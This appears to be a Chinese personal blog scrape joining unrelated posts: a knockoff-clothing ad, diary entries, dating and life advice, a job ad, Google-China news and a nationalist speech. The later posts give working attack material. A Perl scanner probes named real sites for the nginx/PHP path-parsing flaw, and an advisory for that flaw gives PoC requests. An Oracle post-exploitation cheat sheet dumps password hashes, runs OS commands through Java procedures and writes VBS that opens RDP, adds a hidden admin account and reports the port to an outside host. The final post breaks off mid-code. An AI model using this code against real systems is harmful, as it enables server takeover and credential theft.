服装基本都是仿货。相对价格很低。
特价区最低低至10-20元。很低的价格了哟。
有需要的朋友们可以去逛一逛 淘一淘
也许有您喜欢的。

http://kr-fans.taobao.com

www.kr-fans.com

• 暂无相关日志

自从来成都上班这一年。感觉人累了很多。但是也很充实。

今年就满23了。可每天早上起来洗漱完。穿上衬衫西裤。照照镜子。这哪是23啊。分明32嘛。

说来才23岁。感觉还小。可是 想想还有那么两三年也要结婚了。到现在还想啥啥没有。杂过呀。

要房要车要老婆的。每天就只知道工作工作工作。连学习是什么东西都忘了。

今天也是。累了好几天。啥事都堆在一起。不是我懒，没做。而是每天都有不同的新事。

有时候想想。我到底是为了钱而做事。还是在为什么呀？

其实做安全这块的。不是为了能找多少钱多少钱。大家的最初目的而最终目的其实都是一样。那就是证明自己的价值。证明自己不是个废人。

不管如何。虽然我技术菜。可是我有在努力。虽然我缺少学习时间。但是我的工作也能带给我很多的经验。

今天原本是在睡觉的。睡到半夜起来。无聊就打开T410上网。一是查查资料。二是看看朋友们的BLOG。了解下而已。

打算以后每天抽出半小时锻炼身体。再抽出2个小时看书。不管有多累。都得坚持这习惯了。不然感觉真的好杯具。

哎 也不知道写什么。因为头还痛着。不管怎样。随便记录点吧。

关电脑。休息会。一会还要上班。

祝各位朋友身体健康。钱嘛。能多找就多找。不能多找。够用就行。身体才是重要的。

• 暂无相关日志

喝酒喝好，不代表喝完吐吐完喝，在量上占个老大。

告别网恋吧，相比之下家人介绍的对象还是可以看看，必竟知根知底比较把握，少走弯路。

周末有带情人泡午夜场的钱，不如给母亲买点水果买点菜，趁现在子欲养而亲还在。

多赚点钱，但不要多到谁看上你，你都会觉得其只是看上你的钱的地步。

中年女人，实力比你雄厚，还是要选择说不。因为你付出的
一定比得到的会多。

曾经背叛过你的女人想回头，对其说不。

你曾经背叛的女人请你回头，对其说不。

穿着假名牌，不如一身便装，但求干净整洁。
对于年少时向一个女人做过的错误的诺言,你要有勇气违背它

大事坚持原则，小事学会变通。

没必要和女友争个面红耳赤，她错了，你让着，她会感激你，其实她知道是她不讲理。

有钱买块好表，比在自己有脖子上加条一指来粗的金链子让人看着有品味。

别再动不动就想用武力解决问题,你不是泰森，也不是陈浩南

不要爱上有家的女人，有一天你会觉得自己很白痴。

每年做个身体检查，尤其是肝，肺，胃以及血压。

偶尔和父亲促膝喝点小酒，永远比和一帮酒肉朋友在一起买醉来得开心。

对于你真正要与其结婚的女友，要忠诚。

不要再认为你在玩别人的感情，对手可能比你道行要高。

爱她，要做好安全措施；不爱她，就更要做好安全措施。

不要再当月光族，你该学着攒些钱了。

十七八岁没钱没卡叫潇酒，二十五以上没钱没卡叫没安全感

永远记住，游戏与麻将叫消遣，不要沉迷。

除非真有必要，一般人通常没必要去买8888那样的四联号。

否则见你其人，会以为你是卖卡的。

了解父母的身体状况。

此时的你至少该有张驾照，无论你是否有车。

N个酒肉朋友，也比不上一个与你肝胆相照的真哥们。

轻易不要借钱，也轻易不要借给别人钱，除非你不指着他还

不要才开始相处就要求你的女友洗衣做饭样样精通，结了婚

她自然就会为你做这些。

不要强调结婚以后你的女友一定要孝顺你的父母，人与人是相互的，只要你做到了，她也会的。

不要才开始相处就提结婚，也不要处了一年还不提结婚。

不要再想你这辈子必须找个张柏芝或李嘉欣，因为你不是周润发。

不要找比自己小五岁以上的女孩，如果你不是很有钱。

买份保险，如果单位办了社保，就不必了。

给母亲花一块钱母亲的笑容也是发自内心的灿烂。

有自己去泡桑那的时候不如陪父亲去洗个澡，给他搓搓背。

万事随缘，但不要放弃努力。

不要给自己太大压力，不要学做李嘉成，李嘉成当初也不知
他会是今日的李嘉成。

有剩余资金，可以考虑买房了。哪怕只够付个首期。

无需把女人看得太复杂，人与人之间往往是彼此复杂化，当然，也不要当她们是白痴。

不要非等到情人节，才肯花个三头五百去买花，平时的一块巧克力，她也会笑逐颜开。

有和女友去开房的钱，不如存下来，假期时一起出去旅次游，感情会更深。

帮女友家换个灯泡，有时比给女友买套SK2还来得实惠。

女友多再不是你可以骄傲的本钱，只会被认为老大不小了还没个正事。

对女友好不是件磕趁事儿，尤其人多的时候，对女友呼来喝去，只会让人觉得你很没品。

此时的你再是闲人一个，没人会再夸你是浪子。

不要今天中华明天生命源，不如固定在天天大云的标准上。

假如你是中专以下学历，那么无论自考还是函授，还是提高一下，总有一天会有收益。

别瞧不起你正经上班的哥们，他们要找对象，比你有条件。

没做到的事不要轻易承诺，承诺过了，假如可以，还是努力做到。男人信誉很重要。

专一一点吧，没什么不好。

常关心一下你的女友，但关心不等于磨几。

不要相信女人喜欢AA制，该买单的时候还是要买的，男人爽快还是很有吸引力的。

不要以为男人就可以不注重形象，女人也不是瞎子。

多半女人认为，男人认真的时候最有魅力，无论是认真工作，还是认真****。

男人的眼泪可以流，用得适当，效果很好。常流不止，结果就让人作呕了。

新闻实事必看,哪怕有些事情不是你能说了算的,但你得了解

至少要保留一种健康的爱好,如：游泳,足球,健身，蓝球等

不要羡慕谁的铁子比你多，他们的闹心事和这个数目也是成正比的。

永远不要认为别人的媳妇比你的好,因为她必竟不是你媳妇

鞋还是擦得光亮些吧，哪怕它不是名牌，也比一脚泥的AIDD还得顺眼。

多夸夸你的女友，哪怕是伪心的，她的心情好了，你也轻松不少。

想继续发展的女友最好带给母亲看一看，老人的眼睛有时候确实比你雪亮。

有聊QQ的时间，不如多看看新闻。

衣服不用一天一换，但也不要一周也不换一次。

和女友的女友要保持一定距离，太远她会说你对她朋友不热情，太近事儿可就大了。

永远不要夸你女友的女友，那会是她最忌讳的事情，最好是不要评价。

没有任何一件事,任何一个女人,值得你彻夜不眠或借酒浇愁
人，就这一辈子，开心就好。

• 暂无相关日志

#先用列表吧，没有用记事本保存列表再读再扫嘿嘿
my @bbslist1;
push @bbslist1,”http://bbs.xxx.com/robots.txt“;
push @bbslist1,”http://bbs.yyy.com/robots.txt” ;
push @bbslist1,’http://bbs.pctutu.com/robots.txt’;
push @bbslist1,’http://bbs.yahoo.cn/robots.txt’;

#Server: nginx/0.8.13
#Content-Type: text/html

print “\t\tNginx漏洞扫描程序 \n\n”;
foreach my $url (@bbslist1){
  print “目前正在扫描：$url\n”;
 my $response= $browser->get( $url);
 $response->is_success or say(“Failed to get ‘$url’:\n”, $response->status_line);
 my $servertype = $response->server;
  print “$servertype\n”;
 if ($servertype=~/nginx/){
  my $typeold=$response->content_type;
  print “$typeold\n”;
  my $url2=$url.’/xysky.php’;
  my $response2 = $browser->get( $url2);
  $response2->is_success or say(“Failed to get ‘$url2′:\n”, $response->status_line);
  my $typenew=$response2->content_type;
  print “$typenew\n”;
  if ($typeold eq $typenew){
    print “站点 $url 暂没有发现漏洞.\n\n”;
  }else{
    print “站点 $url 存在该漏洞.\n\n”;
  }
 }else{
 print “站点不是nginx,Sorry!\n\n”;
 }
}

• 暂无相关日志

黑盒访问
 

http://www.80sec.com/robots.txt/1.php

查看文件是否存在和返回的HTTP头就可以知道是否存在此漏洞。

同时，如果服务器支持了PHP，但应用中使用的是asp就可以通过如下方式来直接查看服务端asp源码
 

http://www.80sec.com/some.asp/1.php

漏洞厂商：http://www.microsoft.com

解决方案：

我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0


• 暂无相关日志


location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的，这里就是产生问题的点。而为了较好的支持PATH_INFO的提取，在PHP的配置选项里存在cgi.fix_pathinfo选项，其目的是为了从SCRIPT_FILENAME里取出真正的脚本名。
那么假设存在一个http://www.80sec.com/80sec.jpg，我们以如下的方式去访问

将会得到一个URI

/80sec.jpg/80sec.php

经过location指令，该请求将会交给后端的fastcgi处理，nginx为其设置环境变量SCRIPT_FILENAME，内容为

/scripts/80sec.jpg/80sec.php

而在其他的webserver如lighttpd当中，我们发现其中的SCRIPT_FILENAME被正确的设置为

/scripts/80sec.jpg

所以不存在此问题。
后端的fastcgi在接受到该选项时，会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理，一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用，所以该选项一般配置开启。Php通过该选项之后将查找其中真正的脚本文件名字，查找的方式也是查看文件是否存在，这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为

/scripts/80sec.jpg和80sec.php

最后，以/scripts/80sec.jpg作为此次请求需要执行的脚本，攻击者就可以实现让nginx以php来解析任何类型的文件了。

http://www.80sec.com/80sec.jpg/80sec.php

POC： 访问一个nginx来支持php的站点，在一个任何资源的文件如robots.txt后面加上/80sec.php，这个时候你可以看到如下的区别：

访问http://www.80sec.com/robots.txt

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

访问访问http://www.80sec.com/robots.txt/80sec.php

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

其中的Content-Type的变化说明了后端负责解析的变化，该站点就可能存在漏洞。

漏洞厂商：http://www.nginx.org

解决方案：

我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0

或者

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}


• 暂无相关日志

朋友叫帮忙发的。需要的童鞋请自主联系。。。

职位要求:
1.良好的技术感觉,快速的学习能力;
2.精通php/shell/perl/python/c等至少一种语言;
3.对linux/Unix环境下的开发有一定经验;
4.对网络协议有一定的了解;
5.轻松阅读英文技术文档;
6.认可公司文化,有高度的责任心和良好的团队协作意识;
7.不限工作经验和学历。

满足如下要求有加分:
1.有网络渗透测试和防护经验;
2.有过open source项目的开发经历;
3.对网络安全有兴趣。

岗位描述:
1.公司内部网络安全防护和信息安全管理系统的开发;
2.参与安全事件的排查,跟踪与定位;
3.参与日常的信息安全管理工作。

联系方式：showrun.lee@gmail.com

工作地：北京

待遇：面议

• 暂无相关日志

谷歌公司称打算继续在中国的研发工作，并还将保留在中国的销售业务。 Google香港首页上有“欢迎您来到谷歌搜索在中国的新家”字样。

同时Google 创建一个新的监视服务，以报告海外Google 服务在中国大陆是否可以访问：http://www.google.com/prc/report.html 。

据网友反应北京时间3月23日凌晨2点31分左右，google.cn自动跳转至google.com.hk，同时界面显示：“欢迎来到谷歌搜索在中国的新家”。

另据网友反应，若此前用户设置的是谷歌的个性化界面，则在输入google.cn时，域名不会有跳转现象。

谷歌声明：仍保留技术、销售办事处

谷歌转移中国大陆的搜索引擎服务，但会继续保持在中国大陆的其它业务服务。

谷歌计划继续保留在中国大陆的技术和销售办事处，以便为当地做技术支持以及为位于美国的搜索引擎销售中文广告服务。

今天稍早：

权威财经媒体英国《金融时报》报道，谷歌最早于今日宣布关闭其中国搜索引擎。 《金融时报》更进一步表示，谷歌极可能完全从中国退出(包括Google在中国的研发机构，和手机业务)，而不是最早预期的只是关闭google.cn。《金融时报》表示，谷歌完全从中国退出，暗示谷歌和中国政府没有达成任何基本的共识。

美国国务院发言人 Philip Crowley 确认 Google下午将有新宣布

与此同时，美国国务院发言人 Philip Crowley 告诉记者：“我们知道这个下午Google将有一个宣布，我们已经说过，这是Google的决定。我不会评论，因为我们不知道Google的宣布，我们一起来等待吧“

谷歌已经推迟了与中国联通联合发布三星、摩托罗拉两款Google Android平台智能手机的计划，它势必直接影响Android智能手机在中国发展的前景。

而谷歌独立品牌的智能手机Nexus One也绕过中国大陆，直接在香港、台湾地区和新加坡等华人区域进行推广。

上周末各媒体纷纷猜测 Google宣布退出中国时间

3月22日报道，谷歌公司退出中国的传闻周末再次升温。20日和21日，美国有线电视新闻网(CNN)、英国路透社等媒体纷纷猜测，谷歌退出中国已无法改变，现在只是时间问题。CNN更是爆料说，谷歌将于22日宣布退出中国市场，具体退出日期是在4月10日。中国社科院美国所学者倪峰21日接受《环球时报》记者采访时表示，“我个人认为谷歌的退出已成定局，改变的可能性非常小了”。

CNN20日爆料称，谷歌中国内部员工透露,谷歌将于22日宣布退出中国市场的消息，而退出中国市场的具体时间可能是在4月10日。报道分析说，对在中国有业务的互联网公司来说，3月31日是重续执照的最后期限，所以谷歌宣布退出中国市场的时间不会拖太久。谷歌首席执行官施密特上周也表示，谷歌将“很快”作出决定。

路透社21日称，谷歌可能最早于下周宣布退出中国市场。报道称，在宣布退出中国的决定之际，谷歌还将公布针对谷歌中国员工的补偿方案。美国《华盛顿邮报》20日称，各种迹象表明，谷歌正在按计划关闭Google.cn的中文搜索引擎。

为Google送行：

• 暂无相关日志

但是我看过后给我的感觉是。他写的就是现在的中国。中国是什么样？中国人是什么样？看下面的就知道。

———————————————————————-

如果这文章转得不好。会被河蟹。请提前通知我。

河蟹。因为言论已不再自由。

————————————————————

1.日本人宁愿喜欢黑人，也不喜欢我们，因为现在的中国人没有了精神。

2.大家都在嘲笑俄罗斯，但我知道俄罗斯将来一定会发达，因为那里的人2天没吃饭了饿着肚子还排队，而我们有2个人也要挤的不可开交。

3.日本人侵犯我们，因为我们出了很多汉奸。将来日本人侵犯我们，还会不会有汉奸？谁将是未来中国的汉奸？在座的诸位很大一部分都将是。因为你们嘲笑爱国者，崇拜权势和金钱，鄙夷理想和志气。

4.谁现在就是汉奸？北大清华的学生，因为用他们学习的知识帮外国人开拓市场，打败我们中国的企业

5.我们漠视历史的价值，总以为楼宇越新越好，但你到法国市中心看看，几乎没有什么新建筑，他们以历史积淀为自豪，而我们以不断地拆楼建楼来折腾自己。

6.教育的本职不是谋生，而是唤起兴趣，鼓舞精神。靠教育来谋生和发达也是可以的，却被我们过度重视了。

7.将来中国即使发达了，但你看看那些开着豪华车的富翁们从车窗外向外吐痰、扔垃圾。你就知道，如果没有教育，中国再富裕也不会强大。

8.读书是为了承担责任。但现在的教育让女人承担了太多责任，让男人逃避了太多责任。

9.人类历史，实际就是一连串冲动。所以大家不要鄙视冲动，因为冲动都是可爱地。

10.中国的篮球不缺乏技术，不缺乏金钱，但他们缺乏责任感，哪怕是对消费者的责任感。

11.会唱歌的人用气息发音，所以不累。当我看到你们说话时喉头是动的，我就知道你唱歌肯定不好。

12.未来20年，中国人崇拜的将是知识而不是官员。这一点我们应该向日本学习，这个民族对知识的尊重，无以复加。但现在在中国有点钱的人，有点小权的人–哪怕是个科长，也可以照样把大学教授弄得没有尊严。这种貌似聪明的聪明，洋洋自得的市侩，是多么肤浅啊。

13.一个男人，只可以给自己的父母和妻子下跪，只可以对自己的老师鞠躬，绝对不应当对权贵与金钱低头。但如今，大多数人正好反了。

14.日本人为什么不道歉，日本总统为什么不谢罪？因为他们知道，日本人的尊严和历史最重要，相反其它亚洲的不满太没有分量，所以他们可以置之不理。

15.教育应该让中国懂得自尊。但是现在我们看到外国人就低头，女生看到外国垃圾一般的男人都想讨好。同志们，在外国人面前我们多么地没有尊严。在留学的日本东京大学的人当中，我是唯一回来的，但日本人反而敬重我，因为我活得有灵魂，活得有骨气。

节选：
“在中国这个发展中国家,你能建10所世界一流大学,那美国有多少所?日本有多少所?现在的实际状况是：世界上前200所大学，中国一所都排不进!在亚洲能排出几所?我到国外去看了以后，感到要将浙大建成世界一流大学就像共产主义理想。”

“ 以前说‘无知无畏’，现在却是‘无知才无畏’。许多企业把浙江省技术监督局、科委的人请来吃一顿饭，喝一点酒，他就给你签个字，再把我们这些教授胁迫到那里去，给你盖个章，然后就是‘填补国内外空白’、‘国际先进水平’。写论文则是‘国际领先水平的研究成果’、‘首次科学发现’等等。这都是目前非常严重的问题!作为一个大学教授，我深深地为此担忧!这不是我们的责任，是我们的领导无知，是他们倡导了这个主流。我知道在座的处长或老总日子很难过，因为你们不写这样的报表，就拿不到钱，项目就得不到批准，教授也同样如此，天天写报告，而不是在实验室静下心来好好搞研究，这是很严重的!”

“我们国家的现实和发展就是这样：凡是依赖不成的，我们自己都能搞得像模像样，比如二弹一星、凡是能够引进的，就都搞不成…….现在很多合资企业就这样，卖点东西，而没有去考虑这些深层次的东西。殊不知，这就是社会的恶性循环!”

“ 我认为：语言、计算机就是工具。中国的外语教授讲英语还不如美国卖菜的农民!怎么看待这个问题?日本博士、德国教授说不出英语的多得是!我们怎么能说一个人不会说英语就是文盲呢?语言就是一个工具!你没有那个环境,他怎么能讲这个语言呢?……如果我是教育部长，我要改革二件事：
第一,取消六级考试。你一个研究生连中文一级都不及格，你英文考六级干什么呢?看看研究生写得论文，自己的民族文化都没有学好，天天考英语——打勾：托福打勾、ＧＲＥ打勾、英文考出很高的分。可哪个写的英文论文在我面前过得了关呢?过不了关!这样培养出来的人能干什么?自己搞的专业一点都没学好!……说不会计算机就是文盲，这又是一个误区!我现在是教授，我顾不上搞计算机!”

“你看我,从高中开始学英语，大学学，硕士学，博士学，花了我多少精力!你说中国人怎么做得出高科技的研究成果?我这几天就教训我手下的几位女学生，问她们在干什么，看不到人影，一天到晚考这样、考那样的，到美国去干什么?在国内要干的事多着呢!你整天考英语,美国人连报个名都要收你们的钱，日本人也是如此，中国学生到日本去要交手续费，到日本留学是为日本人打工，好不容易挣点钱交了学费，读完博士在日本的公司就职当劳动力，挣了一笔钱后要回国了就买了家电，把钱全给了日本人。你们都没有注意这件事，这里面都是经济问题。这就是素质教育到底是什么。”

　“中小学的教育就是听话，老师管干部，干部管同学，孩子们都学会了成年化的处世方式。这是害人啊!这样强迫性地做了一些好事后，没有把做好事与做人准则结合起来去培养，而只学会了拍马屁、讨老师喜欢、说成人话。上次电视上就曾经播出，一个小孩得了个奖，主诗人问他最愿意说什么，他说：“我最愿意跟江爷爷说:我向你报告!““江爷爷”是谁?还不是老师教的!孩子们在中小学活得很累，到了大学就没人管了，所以就要玩、就要谈恋爱。”

“我们有很多同学成绩好，却什么都做不了。在我们大学像我这种程度的人，招博士生是从来不看成绩的，成绩算什么!现在我从事的这个领域在中国有叁个杰出的人才，当初在读研究生时都补考过，而成绩考得好的几个人却都跑到美国去卖中药了。这说明了什么问题?作老板的可不能这样啊!……人才的梯队一定要合理，而不要认为教授就是万能的、博士就是万能的。中国的教育体系就是让每一个老百姓都充满希望和理想，教育孩子们要树立远大的理想。实际上，人的能力是不一样的。扫地能扫好，也应该受到尊重；打扫厕所能打扫干净,也应该受到尊重,不能动不动就要高学历。我要提醒的是：在国外可不是这样。美国、日本的博士就很难找到工作，为什么? 因为老板心疼钱，招了博士要给他高工资，而他能做什么用呢?这是个具体问题.”

“科技到底该干什么? 高科技到底该干什么?如果我是科技部长，该玩的就玩，就像陈景润，他就是玩!陈景润如果是处在今天的中国,他绝对是要去讨饭的，因为他不会去搞产业化，他的英语也不好，他说话都不流利，中文都讲不好，按现在“标准“,他是个文盲,还谈什么教授!日本人就是喜欢美国人，我跟日本人说：你们这个民族爱谁，谁就要向你们扔原子弹。日本人就是喜欢黑人也不喜欢中国人…….我特别对我们的女教授、女同学说：在日本人面前一句日文都不要讲，会也不要讲；日本人一听说你讲英文，特别是看到中国女孩讲英文，腿都要发软，这是真的!”

“中国人为什么这些年都往外跑，最重要的是要让国民自己爱自己国家…….如果我是杭州的市长，我绝对不是狭隘的民族自尊心——如果杭州有什么灾难，我就首先把杭州的老百姓安排在香格里拉，让外国人在外面排队!(掌声!)这样,你才会让你的国民爱自己的国家!一个日本的农民跑到峨嵋山去玩,骨头摔断了，你就用中国空军的直升飞机去救他，而在日本大学一名中国留学生在宿舍里死了7天才被发现；名古屋大学的一对中国博士夫妇和孩子误食有毒磨菇，孩子和母亲死了，父亲则是重症肝炎，在名古屋大学医学院的门诊室等了12个小时，也没有一个日本教授来看望!而你们为什么还要这么友好，以为自己很大度，实际上是被人家耻笑，笑你的无知!你们这个民族*!我们不能这样!我们的领导人跑到国外去访问，看到有几个人在欢迎他们，就感到挺有面子；而外国来了个什么人物,都是警车开道，这究竟是怎么回事?这让我们中国人感到是自豪还是悲哀?所有这些，对教育工作来讲，都是深层次的问题。所以我经常讲，我作为一位自然科学工作者，我教育我的学生，首先是学会做人。没有这些，你学了高分子，外语都是花架子。”

• 暂无相关日志

基本查询指令
select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs\\查询当前用户角色
select * from user_sys_privs\\查询当前用户系统权限

select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee=’SYSTEM’;\\查系统权限
grant select any dictionary to system with admin option;\\登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name=’SCOTT’; //低版本查看单用户密码
Select username,decode(password,NULL,’NULL’,password) password FROM dba_users; //查看用户hash
create user bob identified by iloveyou;\\建用户bob密码iloveyou
grant dba to bob;\\赋予bob DBA权限
grant execute on xmldom to bob \\赋予用户execute
Create ROLE “javauserpriv” NOT IDENTIFIED
Create ROLE “javasyspriv” NOT IDENTIFIED \\当提示role ‘JAVASYSPRIV’ does not exist使用
select grantee from dba_role_privs where granted_role=’DBA’; \\检查那些用户有DBA权限
select * from dba_directories;\\查看路径所在目录

第二部分,创建java,执行系统命令

no.1

Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors

上面这个没有回显的

如果不行可以使用下面这个

Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors

执行完后
执行

exec oracmd.exec ('net1 user robert iloveyou /add');

no2.

Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS
import java.io.*;
public class Host {
public static void executeCommand(String command) {
try {
String[] finalCommand;
if (isWindows()) {
finalCommand = new String[4];
// Use the appropriate path for your windows version.
finalCommand[0] = "C:\\windows\\system32\\cmd.exe";  // Windows XP/2003
//finalCommand[0] = "C:\\winnt\\system32\\cmd.exe";  // Windows NT/2000
finalCommand[1] = "/y";
finalCommand[2] = "/c";
finalCommand[3] = command;
}
else {
finalCommand = new String[3];
finalCommand[0] = "/bin/sh";
finalCommand[1] = "-c";
finalCommand[2] = command;
}

final Process pr = Runtime.getRuntime().exec(finalCommand);
pr.waitFor();

new Thread(new Runnable(){
public void run() {
BufferedReader br_in = null;
try {
br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
String buff = null;
while ((buff = br_in.readLine()) != null) {
System.out.println("Process out :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_in.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process output.");
ioe.printStackTrace();
}
finally {
try {
br_in.close();
} catch (Exception ex) {}
}
}
}).start();

new Thread(new Runnable(){
public void run() {
BufferedReader br_err = null;
try {
br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
String buff = null;
while ((buff = br_err.readLine()) != null) {
System.out.println("Process err :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_err.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process error.");
ioe.printStackTrace();
}
finally {
try {
br_err.close();
} catch (Exception ex) {}
}
}
}).start();
}
catch (Exception ex) {
System.out.println(ex.getLocalizedMessage());
}
}

public static boolean isWindows() {
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
return true;
else
return false;
}

};
/
Create or REPLACE PROCEDURE host_command (p_command  IN  VARCHAR2)
AS LANGUAGE JAVA
NAME 'Host.executeCommand (java.lang.String)';
/
EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
/
DECLARE
l_output DBMS_OUTPUT.chararr;
l_lines  INTEGER := 1000;
BEGIN
DBMS_OUTPUT.enable(1000000);
DBMS_JAVA.set_output(1000000);

host_command('dir C:\');

DBMS_OUTPUT.get_lines(l_output, l_lines);
END;

这个要注意两点
win下注意系统路径
linx下注意注释掉win
最后一句就是执行命令的
host_command(‘dir C:\’);

no3.

create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
/
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;

这句注意最后这里要授权下当前登陆的用户

grant javasyspriv to system

最后执行

exec  :=run_cmz('ipconfig');

第二部分 操作磁盘文件
no1.
建立目录

create or replace directory DIR as 'C:\';

此目录当然也可以是启动目录

授权

grant read, write on directory DIR to system

这步可以不用
然后执行操作

写文件 3129_code.txt
# 鬼仔注：写文件的这段代码被nod32误报，好多人以为是被挂马了，无奈只好写进txt了

这步操作讲下载我的木马到c盘并执行

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389.vbs', 'W');
utl_file.put_line(file, 'Dim OperationRegistry
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec  :=run_cmz('cscript c:\3389.vbs');

vbs开启3389

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'user.vbs', 'W');
utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"'||'&'||'wsnetwork.ComputerName
Set oa=CreateObject("Scripting.FileSystemObject")
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","bob")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/bob",user)
oe.add os&"/bob"
oa.DeleteFile("user.vbs")');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
/
exec  :=run_cmz('cscript c:\user.vbs');

无net添加admin用户

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389p.vbs', 'W');
utl_file.put_line(file, '

Dim OperationRegistry
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)

Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.asp?port=" '||'ccccc'||' TSPort,0
xPost.Send()

TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If
set obj=wscript.createObject("wscript.shell")
obj.Run("sc config TermService start= demand")
obj.Run("sc stop  TermService")
obj.Run("sc start TermService")
wscript.quit
');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec  :=run_cmz('cscript c:\3389p.vbs');
/
exec  :=run_cmz('del c:\3389p.vbs');
/

http://blog.cnmoker.org/read3389/read.asp

这个代码的作用是用来读取对方的3389端口并post下自己的网站数据库里
这个read.asp和ro.asp自己写吧
到此win下操作基本上是完成了

第三部分 linux的一些操作

linux的操作要用到sqlj语言
其实ISTO的kj总早就写了一些
我总结

create or replace and compile java source named bob as
import java.io.*;
import java.net.*;
public class BOB{
public static String listFolder(String path){
File f=null;
String str="";
f=new File(path);
String[] files=f.list();
if(files!=null)
for(int i=0;i<files.length;i++){
str+=files[i]+"\r\n";
}
return str;
}
public static String saveFile(String filepath,String value){
FileOutputStream fos=null;
try {
fos=new FileOutputStream(filepath);
fos.write(value.getBytes());
return "OK";
} catch (Exception e) {
return e.getMessage();
} finally{
if(fos!=null){
